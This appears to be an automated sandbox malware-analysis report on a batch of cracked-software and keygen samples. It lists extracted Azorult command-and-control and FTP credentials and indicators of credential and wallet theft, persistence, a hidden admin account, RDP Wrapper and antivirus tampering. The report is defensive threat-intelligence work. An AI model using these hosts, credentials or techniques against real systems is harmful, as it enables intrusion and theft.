Overview
overview
10Static
static
81.bin/1.bin.exe
windows7_x64
101.bin/1.bin.exe
windows10_x64
102019-09-02...10.exe
windows7_x64
102019-09-02...10.exe
windows10_x64
1031.exe
windows7_x64
1031.exe
windows10_x64
103DMark 11 ...on.exe
windows7_x64
13DMark 11 ...on.exe
windows10_x64
15da0116af4...18.exe
windows7_x64
85da0116af4...18.exe
windows10_x64
8Archive.zi...3e.exe
windows7_x64
8Archive.zi...3e.exe
windows10_x64
8CVE-2018-1...oC.swf
windows7_x64
3CVE-2018-1...oC.swf
windows10_x64
3CVWSHSetup...1].exe
windows7_x64
3CVWSHSetup...1].exe
windows10_x64
3DiskIntern...en.exe
windows7_x64
1DiskIntern...en.exe
windows10_x64
1ForceOp 2....ce.exe
windows7_x64
10ForceOp 2....ce.exe
windows10_x64
10HYDRA.exe
windows7_x64
10HYDRA.exe
windows10_x64
10Keygen.exe
windows7_x64
10Keygen.exe
windows10_x64
10Lonelyscre...ox.exe
windows7_x64
1Lonelyscre...ox.exe
windows10_x64
1LtHv0O2KZDK4M637.exe
windows7_x64
10LtHv0O2KZDK4M637.exe
windows10_x64
10Magic_File...ja.exe
windows7_x64
1Magic_File...ja.exe
windows10_x64
1OnlineInstaller.exe
windows7_x64
8OnlineInstaller.exe
windows10_x64
8Analysis
-
max time kernel
156s -
max time network
165s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-11-2020 16:58
Static task
static1
Behavioral task
behavioral1
Sample
1.bin/1.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1.bin/1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
2019-09-02_22-41-10.exe
Resource
win7v20201028
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
31.exe
Resource
win7v20201028
Behavioral task
behavioral6
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
3DMark 11 Advanced Edition.exe
Resource
win7v20201028
Behavioral task
behavioral8
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win7v20201028
Behavioral task
behavioral10
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win7v20201028
Behavioral task
behavioral12
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
CVE-2018-15982_PoC.swf
Resource
win7v20201028
Behavioral task
behavioral14
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral15
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win7v20201028
Behavioral task
behavioral16
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win7v20201028
Behavioral task
behavioral18
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win7v20201028
Behavioral task
behavioral20
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
HYDRA.exe
Resource
win7v20201028
Behavioral task
behavioral22
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
Keygen.exe
Resource
win7v20201028
Behavioral task
behavioral24
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win7v20201028
Behavioral task
behavioral26
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
LtHv0O2KZDK4M637.exe
Resource
win7v20201028
Behavioral task
behavioral28
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win7v20201028
Behavioral task
behavioral30
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
OnlineInstaller.exe
Resource
win7v20201028
Behavioral task
behavioral32
Sample
OnlineInstaller.exe
Resource
win10v20201028
General
Malware Config
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll acprotect C:\ProgramData\Windows\vp8encoder.dll acprotect -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Processes:
resource yara_rule \ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 \ProgramData\Windows\rfusclient.exe aspack_v212_v242 \ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
Processes:
taskhost.exeLtHv0O2KZDK4M637.execmd.exedescription ioc process File created C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe File opened for modification C:\Windows\SysWOW64\drivers\conhost.exe taskhost.exe File opened for modification C:\Windows\System32\drivers\etc\hosts LtHv0O2KZDK4M637.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 18 IoCs
Processes:
wini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exesys.exerfusclient.execheat.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeRar.exeRDPWInst.exeRDPWInst.exepid process 524 wini.exe 1468 winit.exe 1532 rutserv.exe 1676 rutserv.exe 1600 rutserv.exe 1988 rutserv.exe 276 rfusclient.exe 1588 rfusclient.exe 1060 sys.exe 432 rfusclient.exe 896 cheat.exe 908 taskhost.exe 1644 taskhostw.exe 1600 R8.exe 1036 winlogon.exe 1284 Rar.exe 1680 RDPWInst.exe 2224 RDPWInst.exe -
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll upx C:\ProgramData\Windows\vp8encoder.dll upx C:\ProgramData\WindowsTask\winlogon.exe upx C:\Programdata\WindowsTask\winlogon.exe upx -
Loads dropped DLL 37 IoCs
Processes:
LtHv0O2KZDK4M637.exewini.execmd.exerutserv.exesys.execheat.exetaskhost.execmd.execmd.exepid process 804 LtHv0O2KZDK4M637.exe 524 wini.exe 524 wini.exe 524 wini.exe 524 wini.exe 1732 cmd.exe 1988 rutserv.exe 1988 rutserv.exe 804 LtHv0O2KZDK4M637.exe 804 LtHv0O2KZDK4M637.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 1060 sys.exe 804 LtHv0O2KZDK4M637.exe 896 cheat.exe 896 cheat.exe 896 cheat.exe 896 cheat.exe 908 taskhost.exe 908 taskhost.exe 1252 cmd.exe 696 cmd.exe 928 696 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2252 icacls.exe 2960 icacls.exe 2132 icacls.exe 3040 icacls.exe 2800 icacls.exe 2660 icacls.exe 272 icacls.exe 2368 icacls.exe 472 icacls.exe 292 icacls.exe 3028 icacls.exe 2960 icacls.exe 2528 icacls.exe 1536 icacls.exe 2600 icacls.exe 2200 icacls.exe 2472 icacls.exe 1940 icacls.exe 2872 icacls.exe 1840 icacls.exe 2756 icacls.exe 1828 icacls.exe 964 icacls.exe 2832 icacls.exe 2860 icacls.exe 2760 icacls.exe 3052 icacls.exe 1680 icacls.exe 3040 icacls.exe 3016 icacls.exe 2304 icacls.exe 2320 icacls.exe 2940 icacls.exe 1840 icacls.exe 2456 icacls.exe 2464 icacls.exe 2672 icacls.exe 556 icacls.exe 2940 icacls.exe 2604 icacls.exe 1340 icacls.exe 2984 icacls.exe 2152 icacls.exe 2376 icacls.exe 2788 icacls.exe 2260 icacls.exe 2584 icacls.exe 2688 icacls.exe 324 icacls.exe 2868 icacls.exe 2160 icacls.exe 2764 icacls.exe 1680 icacls.exe 292 icacls.exe 2388 icacls.exe 2664 icacls.exe 2288 icacls.exe 2688 icacls.exe 2444 icacls.exe 2952 icacls.exe 1580 icacls.exe 2596 icacls.exe 2300 icacls.exe 2304 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
LtHv0O2KZDK4M637.exetaskhostw.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run LtHv0O2KZDK4M637.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
LtHv0O2KZDK4M637.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
RDPWInst.exeLtHv0O2KZDK4M637.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList LtHv0O2KZDK4M637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" LtHv0O2KZDK4M637.exe -
Drops file in Program Files directory 31 IoCs
Processes:
taskhost.exeattrib.exeattrib.exeattrib.exeRDPWInst.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe File created C:\Program Files\Common Files\System\iediagcmd.exe taskhost.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File created C:\Program Files\Common Files\System\iexplore.exe taskhost.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\ESET attrib.exe File opened for modification C:\Program Files\AVAST Software\Avast attrib.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Zaxar taskhost.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe File opened for modification C:\Program Files\Malwarebytes\Anti-Malware attrib.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files (x86)\Microsoft JDX taskhost.exe File opened for modification C:\Program Files\ByteFence taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files\360\Total Security attrib.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe -
Drops file in Windows directory 8 IoCs
Processes:
taskhost.exeattrib.exedescription ioc process File opened for modification C:\Windows\java.exe taskhost.exe File opened for modification C:\WINDOWS\McMwt attrib.exe File created C:\Windows\boy.exe taskhost.exe File opened for modification C:\Windows\boy.exe taskhost.exe File created C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\svchost.exe taskhost.exe File opened for modification C:\Windows\NetworkDistribution taskhost.exe File created C:\Windows\java.exe taskhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
sys.exewinit.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sys.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sys.exe -
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 976 timeout.exe 1944 timeout.exe 1768 timeout.exe 2832 timeout.exe 1932 timeout.exe 1168 timeout.exe 820 timeout.exe 2020 timeout.exe 2340 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1044 ipconfig.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2512 taskkill.exe 2112 taskkill.exe 2120 taskkill.exe 1940 taskkill.exe 964 taskkill.exe 1684 taskkill.exe -
Modifies registry class 3 IoCs
Processes:
winit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe -
Processes:
LtHv0O2KZDK4M637.exeRDPWInst.exeRDPWInst.exewinit.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e LtHv0O2KZDK4M637.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 LtHv0O2KZDK4M637.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e LtHv0O2KZDK4M637.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a RDPWInst.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 